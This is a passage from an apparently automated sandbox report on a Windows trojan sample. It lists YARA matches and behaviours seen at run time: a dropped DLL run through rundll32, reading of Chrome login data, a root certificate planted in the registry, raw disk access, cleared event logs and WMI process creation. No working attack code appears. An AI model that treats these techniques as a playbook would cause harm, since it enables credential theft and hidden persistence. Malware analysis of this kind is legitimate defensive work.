      Source: 00000014.00000002.800595582.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 00000014.00000000.312008701.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000014.00000000.312008701.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 00000014.00000000.312008701.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 0000000D.00000002.808468509.000001A748340000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 0000000D.00000002.808468509.000001A748340000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 0000000D.00000002.808468509.000001A748340000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 00000014.00000003.311158753.000001DBFC8B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000014.00000003.311158753.000001DBFC8B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 0000001B.00000002.804950714.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 0000001B.00000002.804950714.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 0000001B.00000002.804950714.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 00000029.00000000.443207792.000002B6680F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000029.00000000.443207792.000002B6680F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 00000029.00000000.443207792.000002B6680F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 0000000D.00000003.435768980.000001A7480A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000024.00000003.404982309.000001DD8FD40000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000024.00000003.404982309.000001DD8FD40000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 0000000D.00000002.805873048.000001A7482D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 0000000D.00000002.805873048.000001A7482D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 00000019.00000002.803062630.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000019.00000002.803062630.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 00000019.00000002.803062630.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 00000024.00000000.407196014.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000024.00000000.407196014.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 00000024.00000000.407196014.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 0000001B.00000003.347285941.0000019599040000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 0000001B.00000003.347285941.0000019599040000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 00000021.00000002.801814113.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000021.00000002.801814113.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 00000021.00000002.801814113.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 0000001A.00000002.802235948.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 0000001A.00000002.802235948.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 0000001A.00000002.802235948.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 00000022.00000000.394316156.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000022.00000000.394316156.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 00000022.00000000.394316156.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 00000015.00000000.316312658.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000015.00000000.316312658.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 00000015.00000000.316312658.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 00000023.00000002.805719068.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000023.00000002.805719068.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 00000023.00000002.805719068.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 0000001B.00000000.348809466.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 0000001B.00000000.348809466.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 0000001B.00000000.348809466.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 00000025.00000000.434199481.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000025.00000000.434199481.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 00000025.00000000.434199481.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 00000025.00000002.820701644.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000025.00000002.820701644.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 00000025.00000002.820701644.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: 00000022.00000002.799993059.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
      Source: 00000022.00000002.799993059.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
      Source: 00000022.00000002.799993059.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
      Source: C:\Users\user\Desktop\file.exeCode function: String function: 004030DC appears 38 times
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04266780: GetModuleHandleA,GetProcAddress,CreateFileA,DeviceIoControl,CloseHandle,10_2_04266780
      Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.dbJump to behavior
      Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winEXE@10/5@4/4
      Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04263750 OpenSCManagerW,OpenServiceW,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,10_2_04263750
      Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exe:Zone.IdentifierJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" -h
      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",open
      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",open
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k WspService
      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" -hJump to behavior
      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",openJump to behavior
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k WspServiceJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0426AC90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,10_2_0426AC90
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0426AD30 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,10_2_0426AD30
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
      Source: C:\Windows\System32\svchost.exeWMI Queries: Provider::ExecMethod - CIMWin32 : Win32_Process::Create
      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\db.datJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_042548F0 LocalAlloc,GetLogicalDriveStringsW,GetVolumeInformationW,SHGetFileInfoW,lstrlenW,lstrlenW,GetDiskFreeSpaceExW,GetDriveTypeW,lstrlenW,SHGetSpecialFolderPathW,SHGetSpecialFolderPathW,lstrlenW,lstrlenW,SHGetSpecialFolderPathW,lstrlenW,lstrlenW,lstrlenW,LocalSize,LocalSize,LocalSize,LocalReAlloc,LocalSize,LocalSize,LocalFree,LocalFree,LocalFree,LocalFree,10_2_042548F0
      Source: svchost.exe, 0000000D.00000002.815278400.000001A74A400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.414184625.000001A74B130000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
      Source: svchost.exe, 0000000D.00000002.815278400.000001A74A400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.414184625.000001A74B130000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
      Source: svchost.exe, 0000000D.00000002.815278400.000001A74A400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.414184625.000001A74B130000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
      Source: svchost.exe, 0000000D.00000002.815278400.000001A74A400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.414184625.000001A74B130000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04265CA0 GetModuleFileNameW,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,FindCloseChangeNotification,10_2_04265CA0
      Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",open
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5908:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4148:120:WilError_01
      Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403121 push ecx; ret 0_2_00403134
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040C7E7 push ecx; ret 0_2_0040C7FA
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_042767F6 push ecx; ret 10_2_04276809
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004012D3 LoadLibraryA,GetProcAddress,_memset,ShellExecuteExW,0_2_004012D3
      Source: file.exeStatic PE information: real checksum: 0x1a90a should be: 0x18b03

      Persistence and Installation Behavior

      barindex
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
      Source: C:\Windows\System32\svchost.exeWMI Queries: Provider::ExecMethod - CIMWin32 : Win32_Process::Create
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetModuleHandleA,GetProcAddress,CreateFileA,DeviceIoControl,CloseHandle, \\.\PhysicalDrive010_2_04266780
      Source: C:\Windows\System32\svchost.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\844918F60F939B112F07B402C479421800EB2CD5 BlobJump to behavior
      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\db.dllJump to dropped file

      Boot Survival

      barindex
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetModuleHandleA,GetProcAddress,CreateFileA,DeviceIoControl,CloseHandle, \\.\PhysicalDrive010_2_04266780
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04263750 OpenSCManagerW,OpenServiceW,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,10_2_04263750
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0425A010 ClearEventLogW,OpenEventLogA,ClearEventLogW,CloseEventLog,10_2_0425A010
      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5HQ15BTC-BI2Q-S1J7-YRC6-SZJY3C3CP8J7}\650478DC7424C37C 1Jump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
